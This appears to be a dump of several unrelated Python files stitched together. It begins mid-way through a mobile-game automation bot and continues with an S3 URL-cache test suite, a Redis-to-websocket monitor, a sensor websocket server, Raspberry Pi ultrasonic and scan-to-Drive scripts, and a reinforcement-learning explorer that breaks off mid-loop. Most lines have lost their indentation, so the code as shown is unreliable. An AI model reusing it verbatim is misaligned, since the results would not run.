'12-3': lambda: Utils.swipe(1250, 530, 1300, 540, 300),
'12-4': lambda: Utils.swipe(960, 300, 960, 540, 300),
'13-1': lambda: Utils.swipe(1020, 500, 1300, 540, 300),
'13-2': lambda: Utils.swipe(1125, 550, 1300, 540, 300),
'13-3': lambda: Utils.swipe(1150, 510, 1300, 540, 300),
'13-4': lambda: Utils.swipe(1200, 450, 1300, 540, 300)
}
swipes.get(self.chapter_map, lambda: Utils.swipe(1300, 540, 960, 540, 300))()
# disable subs' hunting range
if self.config.combat["hide_subs_hunting_range"]:
Utils.script_sleep(0.5)
Utils.touch_randomly(self.region["open_strategy_menu"])
Utils.script_sleep()
Utils.touch_randomly(self.region["disable_subs_hunting_radius"])
Utils.script_sleep()
Utils.touch_randomly(self.region["close_strategy_menu"])
target_info = self.get_closest_target(self.blacklist)
while True:
Utils.update_screen()
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 5
if self.config.combat['retreat_after'] != 0 and self.combats_done >= self.config.combat['retreat_after']:
Logger.log_msg("Retreating after defeating {} enemies".format(self.config.combat['retreat_after']))
self.exit = 2
if self.exit != 0:
self.retreat_handler()
return True
if self.kills_count >= self.kills_before_boss[self.chapter_map] and Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9):
Logger.log_msg("Boss fleet was found.")
if self.config.combat['boss_fleet']:
s = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
Utils.touch_randomly(self.region['button_switch_fleet'])
Utils.wait_update_screen(2)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
if self.chapter_map == 'E-B3' or self.chapter_map == 'E-D3':
# sometimes the fleet marker blocks the view of the boss icon
# moving the boss fleet first to the right and then to the left
# to get a clear view of the boss
counter = 1
self.fleet_location = [960, 540]
while not boss_region:
if counter % 2 != 0:
Utils.touch([self.fleet_location[0] + (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] += (counter % 5) * 200
else:
Utils.touch([self.fleet_location[0] - (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] -= (counter % 5) * 200
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
counter += 1
if counter == 5: counter += 1
if counter == 10:
# back to starting position
counter = 1
self.fleet_location = [960, 540]
else:
while not boss_region:
if s > 3: s = 0
swipes.get(s)()
Utils.wait_update_screen(0.5)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss")
s += 1
# swipe to center the boss fleet on the screen
# first calculate the translation vector coordinates
                    horizontal_translation = 150 if boss_region.x < 960 else -150
angular_coefficient = -1 * ((540 - boss_region.y)/(960 - boss_region.x))
Utils.swipe(boss_region.x + horizontal_translation, boss_region.y + int(horizontal_translation * angular_coefficient),
960 + horizontal_translation, 540 + int(horizontal_translation * angular_coefficient), 300)
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
while not boss_region:
# refreshing screen to deal with mist
Utils.wait_update_screen(1)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
#extrapolates boss_info(x,y,enemy_type) from the boss_region found
boss_info = [boss_region.x + 50, boss_region.y + 25, "boss"]
self.clear_boss(boss_info)
continue
            if target_info is None:
target_info = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
if target_info:
#tap at target's coordinates
Utils.touch(target_info[0:2])
Utils.update_screen()
else:
continue
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_warning("Unable to reach the target.")
if self.config.combat['focus_on_mystery_nodes'] and target_info[2] == "mystery_node":
self.enemies_list.clear()
self.unable_handler(target_info[0:2])
else:
self.blacklist.append(target_info[0:2])
target_info = None
continue
else:
movement_result = self.movement_handler(target_info)
if movement_result == 1:
self.battle_handler()
target_info = None
self.blacklist.clear()
continue
def clear_boss(self, boss_info):
Logger.log_debug("Started boss function.")
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.fleet_location = None
while True:
#tap at boss' coordinates
Utils.touch(boss_info[0:2])
Utils.update_screen()
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_msg("Unable to reach boss.")
#handle boss' coordinates
if not self.unable_handler(boss_info[0:2], boss=True):
return
continue
else:
self.movement_handler(boss_info)
if self.battle_handler(boss=True):
self.exit = 1
Logger.log_msg("Boss successfully defeated.")
Utils.script_sleep(3)
return
def get_enemies(self, blacklist=[], boss=False):
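        # The similarity threshold starts at 0.99 and decays by 0.005 each
        # pass (bumped back up after a swipe); once enough coordinates are
        # blacklisted, or sim drops below 0.97, the camera is swiped around
        # the map to reveal off-screen enemies before searching again.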
sim = 0.99
        filter_coordinates = len(self.enemies_list) == 0
if blacklist:
Logger.log_info('Blacklist: ' + str(blacklist))
if len(blacklist) > 2:
self.enemies_list.clear()
while not self.enemies_list:
if (boss and len(blacklist) > 4) or (not boss and len(blacklist) > 3) or sim < 0.97:
if self.swipe_counter > 3: self.swipe_counter = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
swipes.get(self.swipe_counter)()
sim += 0.005
self.swipe_counter += 1
Utils.update_screen()
l1 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] - 3, x[1] - 27], Utils.find_all('enemy/fleet_level', sim - 0.025, useMask=True)))
l1 = [x for x in l1 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L1: " +str(l1))
l2 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 110], Utils.find_all('enemy/fleet_1_down', sim - 0.02)))
l2 = [x for x in l2 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L2: " +str(l2))
l3 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 90], Utils.find_all('enemy/fleet_2_down', sim - 0.02)))
l3 = [x for x in l3 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L3: " +str(l3))
l4 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 125], Utils.find_all('enemy/fleet_3_up', sim - 0.035)))
l4 = [x for x in l4 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L4: " +str(l4))
l5 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 100], Utils.find_all('enemy/fleet_3_down', sim - 0.035)))
l5 = [x for x in l5 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L5: " +str(l5))
l6 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 110], Utils.find_all('enemy/fleet_2_up', sim - 0.025)))
l6 = [x for x in l6 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L6: " +str(l6))
if self.config.combat['siren_elites']:
l7 = Utils.find_siren_elites()
l7 = [x for x in l7 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L7: " +str(l7))
self.enemies_list = l1 + l2 + l3 + l4 + l5 + l6 + l7
else:
self.enemies_list = l1 + l2 + l3 + l4 + l5 + l6
sim -= 0.005
if filter_coordinates:
self.enemies_list = Utils.filter_similar_coords(self.enemies_list)
return self.enemies_list
def get_mystery_nodes(self, blacklist=[], boss=False):
"""Method which returns a list of mystery nodes' coordinates.
"""
if len(blacklist) > 2:
self.mystery_nodes_list.clear()
if len(self.mystery_nodes_list) == 0 and not Utils.find('combat/question_mark', 0.9):
# if list is empty and a question mark is NOT found
return self.mystery_nodes_list
else:
# list has elements or list is empty but a question mark has been found
            filter_coordinates = len(self.mystery_nodes_list) == 0
sim = 0.95
while not self.mystery_nodes_list and sim > 0.93:
Utils.update_screen()
l1 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1790), map(lambda x:[x[0], x[1] + 140], Utils.find_all('combat/question_mark', sim)))
l1 = [x for x in l1 if (not self.filter_blacklist(x, blacklist))]
self.mystery_nodes_list = l1
sim -= 0.005
if filter_coordinates:
self.mystery_nodes_list = Utils.filter_similar_coords(self.mystery_nodes_list)
return self.mystery_nodes_list
def filter_blacklist(self, coord, blacklist):
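        """Return True if coord lies within a 40-pixel box of any blacklisted coordinate."""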
for y in blacklist:
if abs(coord[0] - y[0]) < 40 and abs(coord[1] - y[1]) < 40:
return True
return False
def get_fleet_location(self):
"""Method to get the fleet's current location. Note it uses the green
fleet marker to find the location but returns around the area of the
feet of the flagship
Returns:
array: An array containing the x and y coordinates of the fleet's
current location.
"""
if not self.fleet_location:
coords = [0, 0]
count = 0
while coords == [0, 0]:
Utils.update_screen()
count += 1
if count > 4:
Utils.swipe(960, 540, 960, 540 + 150 + count * 20, 100)
Utils.update_screen()
if Utils.find('combat/fleet_ammo', 0.8):
coords = Utils.find('combat/fleet_ammo', 0.8)
coords = [coords.x + 140, coords.y + 225 - count * 20]
elif Utils.find('combat/fleet_arrow', 0.9):
coords = Utils.find('combat/fleet_arrow', 0.9)
coords = [coords.x + 25, coords.y + 320 - count * 20]
if count > 4:
Utils.swipe(960, 540 + 150 + count * 20, 960, 540, 100)
                elif math.isclose(coords[0], 160, abs_tol=30) and math.isclose(coords[1], 142, abs_tol=30):
coords = [0, 0]
self.fleet_location = coords
return self.fleet_location
def get_closest_target(self, blacklist=[], location=[], mystery_node=False, boss=False):
"""Method to get the enemy closest to the specified location. Note
this will not always be the enemy that is actually closest due to the
asset used to find enemies and when enemies are obstructed by terrain
or the second fleet
Args:
blacklist(array, optional): Defaults to []. An array of
coordinates to exclude when searching for the closest enemy
            location(array, optional): Defaults to []. An array of coordinates
                to replace the fleet location.
            mystery_node(bool, optional): Defaults to False. Whether mystery
                nodes should also be considered as targets.
            boss(bool, optional): Defaults to False. True when the search is
                related to the boss fleet.
Returns:
            array: An array containing the x and y coordinates of the closest
                target to the specified location, plus the target type
                ("enemy" or "mystery_node").
"""
fleet_location = self.get_fleet_location()
if location == []:
location = fleet_location
if mystery_node and self.chapter_map[0].isdigit():
mystery_nodes = self.get_mystery_nodes(blacklist, boss)
if self.config.combat['focus_on_mystery_nodes'] and len(mystery_nodes) > 0:
# giving mystery nodes top priority and ignoring enemies
targets = mystery_nodes
Logger.log_info("Prioritizing mystery nodes.")
else:
# mystery nodes are valid targets, same as enemies
enemies = self.get_enemies(blacklist, boss)
targets = enemies + mystery_nodes
else:
# target only enemy mobs
targets = self.get_enemies(blacklist, boss)
closest = targets[Utils.find_closest(targets, location)[1]]
Logger.log_info('Current location is: {}'.format(fleet_location))
Logger.log_info('Targets found at: {}'.format(targets))
Logger.log_info('Closest target is at {}'.format(closest))
if closest in self.enemies_list:
x = self.enemies_list.index(closest)
del self.enemies_list[x]
target_type = "enemy"
else:
x = self.mystery_nodes_list.index(closest)
del self.mystery_nodes_list[x]
target_type = "mystery_node"
return [closest[0], closest[1], target_type]
def check_movement_threads(self):
thread_list = []
# essential threads
thread_check_alert_info = Thread(
target=self.check_movement_threads_func, args=("menu/alert_info",))
thread_check_menu_formation = Thread(
target=self.check_movement_threads_func, args=("combat/menu_formation",))
thread_check_menu_loading = Thread(
target=self.check_movement_threads_func, args=("combat/menu_loading",))
thread_list.extend([thread_check_alert_info, thread_check_menu_formation, thread_check_menu_loading])
        # threads needed for non-event maps (where mystery nodes appear)
if self.chapter_map[0].isdigit():
thread_check_alert_ammo = Thread(
target=self.check_movement_threads_func, args=("combat/alert_ammo_supplies",))
thread_check_item_found = Thread(
target=self.check_movement_threads_func, args=("menu/item_found",))
thread_list.extend([thread_check_alert_ammo, thread_check_item_found])
# threads needed for story maps without clearing mode enabled
if not self.config.combat['clearing_mode']:
thread_check_button_evade = Thread(
target=self.check_movement_threads_func, args=("combat/button_evade",))
thread_check_failed_evade = Thread(
target=self.check_movement_threads_func, args=("combat/alert_failed_evade",))
thread_list.extend([thread_check_button_evade, thread_check_failed_evade])
Utils.multithreader(thread_list)
return self.movement_event
def check_movement_threads_func(self, event):
        self.movement_event[event] = bool(Utils.find(event))
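# --- illustrative sketch, not part of the original module -------------------
# check_movement_threads() runs one template search per thread and collects
# the results in a shared dict. The standalone demo below reproduces that
# pattern with a hypothetical slow_check() standing in for Utils.find().
if __name__ == "__main__":
    import random
    import time
    from threading import Thread

    results = {}

    def slow_check(name):
        # Stand-in for an image search: sleep briefly, record a random hit.
        time.sleep(random.uniform(0.01, 0.05))
        results[name] = random.choice([True, False])

    checks = ["menu/alert_info", "combat/menu_formation", "combat/menu_loading"]
    threads = [Thread(target=slow_check, args=(c,)) for c in checks]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print(results)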
|
test_s3urlcache.py
|
#!/usr/bin/env python
# coding: utf-8
import logging
import os
import io
import shutil
import sys
import unittest
import threading
import requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from requests import HTTPError
pkg_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) # noqa
sys.path.insert(0, pkg_root) # noqa
import dss
from dss import Config, BucketConfig
from dss.config import Replica
from dss.logging import configure_test_logging
from dss.util import networking
from dss.util.s3urlcache import S3UrlCache, SizeLimitError
from tests.infra import testmode
logger = logging.getLogger(__name__)
KiB = 1024
MB = KiB ** 2
randomdata = 'a random string of data'
class HTTPInfo:
address = "127.0.0.1"
port = None
server = None
thread = None
@classmethod
def make_url(cls):
cls.url = f"http://{cls.address}:{cls.port}"
def setUpModule():
configure_test_logging()
HTTPInfo.port = networking.unused_tcp_port()
HTTPInfo.server = HTTPServer((HTTPInfo.address, HTTPInfo.port), GetTestHandler)
HTTPInfo.make_url()
HTTPInfo.thread = threading.Thread(target=HTTPInfo.server.serve_forever)
HTTPInfo.thread.start()
global randomdata
randomdata = os.urandom(MB)
def tearDownModule():
HTTPInfo.server.shutdown()
@testmode.standalone
class TestS3UrlCache(unittest.TestCase):
@classmethod
def setUpClass(cls):
replica = Replica.aws
Config.set_config(BucketConfig.TEST_FIXTURE)
cls.blobstore = Config.get_blobstore_handle(replica)
cls.test_fixture_bucket = replica.bucket
Config.set_config(BucketConfig.TEST)
cls.test_bucket = replica.bucket
def setUp(self):
self.urls_to_cleanup = set()
self.cache = S3UrlCache()
def tearDown(self):
self._delete_cached_urls()
def test_store_in_cache(self):
"""The URL contents are stored in S3 and the contents returned, when requested url is not found in cache."""
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
url_key = S3UrlCache._url_to_key(url)
self._delete_cached_urls()
with self.assertLogs(dss.logger, "INFO") as log_monitor:
url_content = self.cache.resolve(url)
original_data = randomdata[:KiB]
self.assertEqual(len(url_content), KiB)
self.assertEqual(url_content, original_data)
self.assertTrue(log_monitor.output[0].endswith(f"{url} not found in cache. Adding it to "
f"{self.test_bucket} with key {url_key}."))
def test_retrieve_from_cache(self):
"""Stored URL contents is retrieved from S3, when a cached url is requested"""
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
with self.assertLogs(dss.logger, 'INFO') as log_monitor:
url_content = self.cache.resolve(url)
cached_content = self.cache.resolve(url)
self.assertEqual(len(log_monitor.output), 1)
self.assertEqual(url_content, cached_content)
def test_bad_url(self):
bad_urls = ['', '//', 'http://?']
self.urls_to_cleanup.update(bad_urls)
for url in bad_urls:
with self.subTest(bad_url=url):
with self.assertRaises(requests.RequestException):
self.cache.resolve(url)
def test_url_SizeLimitError(self):
"""Exception returned when URL content size is greater than max_size."""
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
self.cache.max_size = 1
with self.assertRaises(SizeLimitError) as ex:
self.cache.resolve(url)
self.assertEqual(ex.exception.args[0], f"{url} not cached. The URL's contents have exceeded "
f"{self.cache.max_size} bytes.")
def test_content_size_0(self):
url = f"{HTTPInfo.url}/0"
self.urls_to_cleanup.add(url)
url_content = self.cache.resolve(url)
self.assertEqual(len(url_content), 0)
def test_chunked_content(self):
size = KiB * 10
url = f"{HTTPInfo.url}/{size}"
self.urls_to_cleanup.add(url)
self.cache.max_size = 1 * MB
self.cache.chunk_size = 1 * KiB
url_content = self.cache.resolve(url)
original_data = randomdata[:size]
self.assertEqual(url_content, original_data)
def test_stored_url_metadata(self):
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
url_key = S3UrlCache._url_to_key(url)
self.cache.resolve(url)
with self.subTest("check dss_cached_url"):
cached_url = self.cache._reverse_key_lookup(url_key)
self.assertEqual(cached_url, url)
with self.subTest("check content_type"):
contentType = self.blobstore.get_content_type(self.test_bucket, url_key)
self.assertEqual(contentType, "application/octet-stream")
def test_evict(self):
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
url_key = S3UrlCache._url_to_key(url)
with self.assertLogs(dss.logger, "INFO") as log_monitor:
# Verify the URL is cached
self.cache.resolve(url)
self.assertTrue(self.cache.contains(url))
# Remove the URL from cache
self.cache.evict(url)
self.assertTrue(not self.cache.contains(url))
self.cache.evict(url)
self.assertTrue(not self.cache.contains(url))
self.assertTrue(log_monitor.output[0].endswith(f"{url} not found in cache. Adding it to "
f"{self.test_bucket} with key {url_key}."))
self.assertTrue(log_monitor.output[1].endswith(f"{url} removed from cache in {self.test_bucket}."))
self.assertTrue(log_monitor.output[2].endswith(f"{url} not found and not removed from cache."))
def test_contains(self):
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
self.assertTrue(not self.cache.contains(url))
self.cache.resolve(url)
self.assertTrue(self.cache.contains(url))
def test_request_fail(self):
"""URL is not cached when url does not return status code 200"""
url = f"{HTTPInfo.url}/abcd"
self.urls_to_cleanup.add(url)
with self.assertRaises(HTTPError) as ex:
self.cache.resolve(url)
self.assertEqual(ex.exception.args[0], f"404 Client Error: Not Found for url: {url}")
def _delete_cached_urls(self):
for url in self.urls_to_cleanup:
self.cache.evict(url)
class GetTestHandler(BaseHTTPRequestHandler):
def do_GET(self):
path = self.path.split('/')[1]
if path.isdigit():
self.generate_random(int(path))
else:
self.generate_error()
def generate_random(self, length):
self.send_response(200)
self.send_header("content-length", length)
self.end_headers()
if length:
shutil.copyfileobj(io.BytesIO(randomdata[:length]), self.wfile)
def generate_error(self):
self.send_response(404)
self.end_headers()
def log_request(self, code='-', size='-'):
if Config.debug_level():
super().log_request(code, size)
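# Illustrative helper, not part of the original tests: GetTestHandler serves
# GET /<n> with the first n bytes of `randomdata`, so a caller can request a
# payload of any size. This sketch assumes the module-level server started in
# setUpModule() is running; the helper name _demo_fetch is hypothetical.
def _demo_fetch(size=KiB):
    resp = requests.get(f"{HTTPInfo.url}/{size}")
    resp.raise_for_status()
    return resp.content  # len(resp.content) == size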
if __name__ == "__main__":
unittest.main()
|
RedisMonitor.py
|
import redis
import threading
import time
class RedisMonitor:
"""
Monitor Redis keys and send updates to all web socket clients.
"""
def __init__(self, host="localhost", port=6379, password="", db=0, refresh_rate=0.5, key_filter="", realtime=False):
"""
If realtime is specified, RedisMonitor will enable notifications for all
set events and subscribe to these notifications.
"""
self.host = host
self.port = port
self.password = password
self.db = db
self.refresh_rate = refresh_rate
self.key_filter = key_filter
self.realtime = realtime
self.redis_db = redis.Redis(host=self.host, port=self.port, password=self.password, db=self.db, decode_responses=False)
self.message_last = {}
if self.realtime:
self.pubsub = self.redis_db.pubsub()
self.lock = threading.Lock()
self.message_buffer = []
# Need to perform the following command to enable keyevent notifications:
# config set notify-keyspace-events "$E"
notify_keyspace_events = self.redis_db.config_get("notify-keyspace-events")["notify-keyspace-events"]
if "$" not in notify_keyspace_events and "A" not in notify_keyspace_events:
# Add string commands to notifications
notify_keyspace_events += "$"
if "E" not in notify_keyspace_events:
# Add keyevent events to notifications
notify_keyspace_events += "E"
self.redis_db.config_set("notify-keyspace-events", notify_keyspace_events)
self.pubsub.psubscribe("__keyevent@%s__:set" % self.db)
def messenger(self, ws_server):
"""
When realtime is set, this thread sends messages to all web socket
clients every refresh_rate seconds.
"""
while True:
time.sleep(self.refresh_rate)
self.lock.acquire()
if not self.message_buffer:
self.lock.release()
continue
keyvals = self.message_buffer
self.message_buffer = []
self.lock.release()
ws_server.lock.acquire()
for client in ws_server.clients:
client.send(ws_server.encode_message(keyvals))
ws_server.lock.release()
def parse_val(self, key, skip_unchanged=True):
"""
Get the value from Redis and parse if it's an array.
If skip_unchanged = True, only returns values updated since the last call.
"""
import re
def isnumeric(s):
"""
Helper function to test if string is a number
"""
try:
float(s)
return True
except ValueError:
return False
if self.key_filter and re.match(self.key_filter, key) is None:
return
val = self.redis_db.get(key)
# Skip if the value hasn't changed
if skip_unchanged:
if key in self.message_last and val == self.message_last[key]:
return None
self.message_last[key] = val
        try:
            # Try decoding the value as a UTF-8 string
            val = val.decode("utf-8")
        except (UnicodeDecodeError, AttributeError):
            # Otherwise, leave it as raw bytes
            pass
return val
def _initialize_redis_keys(self):
import json
interaction = {
"key_object": "",
"idx_link": 0,
"pos_click_in_link": [0,0,0],
"pos_mouse_in_world": [0,0,0],
"modifier_keys": [],
"key_down": ""
}
self.redis_db.set("webapp::simulator::interaction", json.dumps(interaction))
def run_forever(self, ws_server):
"""
Listen for redis keys (either realtime or every refresh_rate seconds)
and send updated values to all web socket clients every refresh_rate seconds.
"""
self._initialize_redis_keys()
if not self.realtime:
# Send messages to clients every refresh_rate seconds
prev_keys = set()
while True:
time.sleep(self.refresh_rate)
key_vals = []
new_keys = set()
keys = [key for key in self.redis_db.scan_iter()]
for key in keys:
if self.redis_db.type(key) != b"string":
continue
key = key.decode("utf-8")
if "high_res" in key:
continue
new_keys.add(key)
val = self.parse_val(key)
if val is None:
continue
key_vals.append((key, val))
del_keys = list(prev_keys - new_keys)
prev_keys = new_keys
if not key_vals and not del_keys:
continue
for key in del_keys:
self.message_last.pop(key, None)
ws_server.lock.acquire()
for client in ws_server.clients:
client.send(ws_server.encode_message({"update": key_vals, "delete": del_keys}))
ws_server.lock.release()
else:
# Create thread to send messages to client with refresh rate
messenger_thread = threading.Thread(target=self.messenger, args=(ws_server,))
messenger_thread.daemon = True
messenger_thread.start()
# Listen for redis notifications
for msg in self.pubsub.listen():
if msg["pattern"] is None:
continue
key = msg["data"]
val = self.parse_val(key)
if val is None:
continue
self.lock.acquire()
self.message_buffer.append((key, val))
self.lock.release()
def initialize_client(self, ws_server, client):
"""
On first connection, send client all Redis keys.
"""
key_vals = []
# TODO: Don't disrupt other clients
self.message_last = {}
for key in sorted(self.redis_db.scan_iter()):
if self.redis_db.type(key) != b"string":
continue
val = self.parse_val(key, skip_unchanged=False)
if val is None:
continue
key_vals.append((key.decode("utf-8"), val))
client.send(ws_server.encode_message({"update": key_vals, "delete": []}))
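# --- illustrative sketch, not part of the original module -------------------
# run_forever() expects a web socket server exposing `lock`, `clients`, and
# encode_message(). The stub below satisfies that interface so the polling
# loop can be exercised without a real front end; it is a demonstration under
# those assumptions, not the project's actual server class.
if __name__ == "__main__":
    import json

    class _StubServer:
        def __init__(self):
            self.lock = threading.Lock()
            self.clients = []

        def encode_message(self, payload):
            return json.dumps(payload)

    RedisMonitor(refresh_rate=1.0).run_forever(_StubServer())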
|
main.py
|
import asyncio
import json
import logging
from utils.driver import AnalogOutput
import websockets
import os
import threading
# Env
SERVER_PORT = int(os.getenv('SERVER_PORT', 6789))
SERVER_URL = os.getenv('SERVER_URL', "localhost")
# Setup logging
logging.basicConfig()
# Body response
CONNECTED_RESPONSE = {
"status": "ok",
"response": "Connection established"
}
driver = AnalogOutput(0)
stop = False
async def sendRealtimeInfo(ws):
while not stop:
response_body = {
'value': driver.getDeviceValue(),
'type': 'realtime_data'
}
await ws.send(json.dumps(response_body))
async def init_connection(websocket, path):
try:
global stop
await websocket.send(json.dumps(CONNECTED_RESPONSE))
async for message in websocket:
data = json.loads(message)
if data['option'] == 'getRealtimeInfo':
stop = False
_thread = threading.Thread(target=asyncio.run, args=(sendRealtimeInfo(websocket),))
_thread.start()
elif data['option'] == 'stopRealtimeInfo':
stop = True
print(data)
    except Exception as e:
        print("Error in connection handler:", e)
# Start server
start_server = websockets.serve(init_connection, SERVER_URL, SERVER_PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
|
ultrasonic.py
|
import RPi.GPIO as GPIO
import time
import threading
import sys
class Ultrasonic:
def __init__(self):
#set GPIO Pins
self.GPIO_TRIGGER = 19
self.GPIO_ECHO = 26
        # set GPIO numbering mode (BCM assumed for pins 19/26) and direction (IN / OUT)
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(self.GPIO_TRIGGER, GPIO.OUT)
        GPIO.setup(self.GPIO_ECHO, GPIO.IN)
self.measurement_interval = 0.2 # in seconds
self.current_distance = 0
self.stopped = False
def distance(self):
        while not self.stopped:
try:
time.sleep(self.measurement_interval)
                # set Trigger to HIGH
GPIO.output(self.GPIO_TRIGGER, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(self.GPIO_TRIGGER, False)
StartTime = time.time()
StopTime = time.time()
# save StartTime
while GPIO.input(self.GPIO_ECHO) == 0:
StartTime = time.time()
# save time of arrival
while GPIO.input(self.GPIO_ECHO) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
self.current_distance = (TimeElapsed * 34300) / 2
#print("Measured Distance = %.1f cm" % self.current_distance)
#press ctrl+c for keyboard interrupt
except KeyboardInterrupt:
#check for exit
self.stop()
sys.exit(0)
def start(self):
t = threading.Thread(target=self.distance, args=())
t.daemon = True
t.start()
def stop(self):
self.stopped = True
GPIO.cleanup()
# Built upon: https://tutorials-raspberrypi.com/raspberry-pi-ultrasonic-sensor-hc-sr04/
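# Illustrative usage, not part of the original module: start the background
# measurement thread and print the latest reading once per second.
if __name__ == "__main__":
    sensor = Ultrasonic()
    sensor.start()
    try:
        while True:
            time.sleep(1)
            print("Measured Distance = %.1f cm" % sensor.current_distance)
    except KeyboardInterrupt:
        sensor.stop()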
|
scan2drive.py
|
#!/usr/bin/python3
import os
import RPi.GPIO as GPIO
from datetime import datetime, timedelta
import time
import subprocess
import threading
drivePathMartin = "gdrive:toOCR/"
drivePathMaddie = "gdrive:toOCR/Maddie/"
pinLight = 24
pinButton = 18
tempDir = "/home/pi/scan2drive/upload/"
scanFormat = "jpeg"
scanCommand = ("scanimage", "--format", scanFormat, "--resolution", "300")
scanFileName = "%Y-%m-%d_%H-%M-%S"
def error_blink(e):
print("error: " + str(e))
for x in range(8):
GPIO.output(pinLight, 0)
time.sleep(0.8)
GPIO.output(pinLight, 1)
time.sleep(0.8)
def scan_upload():
global drivePath
GPIO.output(pinLight, 1)
try:
timestamp = (datetime.now() + timedelta(hours=1)).strftime(scanFileName)
file = tempDir + timestamp + "." + scanFormat
print("Scan and upload " + file)
        with open(file, 'wb') as f:
subprocess.run(scanCommand, stdout=f, check=True)
print("Upload: " + tempDir + " to " + drivePath)
subprocess.run(("rclone", "move", tempDir, drivePath), check=True)
print("Successfully uploaded to " + drivePath)
GPIO.output(pinLight, 0)
except Exception as e:
error_blink(e)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(pinLight, GPIO.OUT)
GPIO.setup(pinButton, GPIO.IN, pull_up_down=GPIO.PUD_UP)
try:
print("ocrscan2drive by martinbreu")
subprocess.run(("mkdir", tempDir))
while True:
GPIO.wait_for_edge(pinButton, GPIO.RISING)
drivePath = drivePathMartin
thread = threading.Thread(target=scan_upload)
thread.start()
time.sleep(0.5)
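        # While the scan thread runs, a second button press (pin pulled low)
        # switches the upload target to Maddie's folder and blinks the light
        # as confirmation.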
while thread.is_alive():
if not GPIO.input(pinButton):
drivePath = drivePathMaddie
GPIO.output(pinLight, 0)
time.sleep(0.8)
GPIO.output(pinLight, 1)
time.sleep(0.8)
continue
except Exception as e:
error_blink(e)
GPIO.cleanup()
|
explorer.py
|
# -*- coding:utf-8 -*-
import pickle
import time
import zlib
from multiprocessing import Process
import zmq
from maddpg.common.env_wrappers import BatchedEnvironment
from maddpg.common.logger import logger
def increment(items, size):
for i in range(size):
items[i] += 1
def explore(args, id):
c = zmq.Context()
s = c.socket(zmq.REQ)
host = 'tcp://%s:%d' % (args.host, args.port)
s.connect(host)
logger.info('zmq socket addr: tcp://%s:%d' % (args.host, args.port))
batch_env = BatchedEnvironment(args, id)
obs = batch_env.reset()
action = batch_env.uniform_action()
i = 0
n = args.env_batch_size
episode = [0] * n
episode_step = [0] * n
while True:
next_obs, rew, done, info = batch_env.step(action)
i += n
increment(episode_step, n)
terminal = [episode_step[i] >= args.max_episode_len for i in range(n)]
